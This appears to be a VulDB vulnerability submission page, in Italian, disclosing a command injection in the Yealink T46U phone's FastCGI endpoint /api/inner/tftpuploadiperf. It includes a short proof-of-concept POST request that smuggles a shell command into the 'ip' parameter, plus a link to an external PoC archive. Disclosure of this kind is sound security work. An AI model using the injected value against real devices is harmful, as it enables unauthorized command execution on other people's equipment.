Invia #834603: yealink T46U 108.86.0.118 Command Injectioninformazioni

Titoloyealink T46U 108.86.0.118 Command Injection
DescrizioneYealink T46U phone firmware `x.x.x.x` contains a command injection vulnerability and a stack buffer overflow vulnerability in the Web FastCGI service `fcgiserver`. The vulnerable endpoint is: ```text POST /api/inner/tftpuploadiperf ``` This endpoint is handled by `mod_webd.TFTPUploadIperf()`. The handler receives the `ip` and `port` parameters from the HTTP request and concatenates them directly into a shell command using `sprintf()`. No handler-local validation, escaping, or length check is applied before the command is passed to `system()`. poc POST /api/inner/tftpuploadiperf?p=Setting&t=<timestamp> HTTP/1.1 Host: <target> Cookie: JSESSIONID=<valid-session> X-Csrftoken: <valid-token> Content-Type: application/x-www-form-urlencoded; charset=UTF-8 ip=127.0.0.1;id>/tmp/tftpuploadiperf_poc&port=69
Fonte⚠️ http://cdn2.v50to.cc/T46U/T46U_mod_webd_TFTPUploadIperf_system_exec.zip
Utente
 ChiChen241 (UID 98424)
Sottomissione21/05/2026 04:57 (25 giorni fa)
Moderazione14/06/2026 15:54 (24 days later)
StatoAccettato
Voce VulDB370866 [Yealink SIP-T46U 108.86.0.118 Web FastCGI Service tftpuploadiperf mod_webd.TFTPUploadIperf ip/port escalationi di privilegi]
Punti20

PrecedenteVisione D'ensembleIl prossimo

Do you know our Splunk app?

Download it now for free!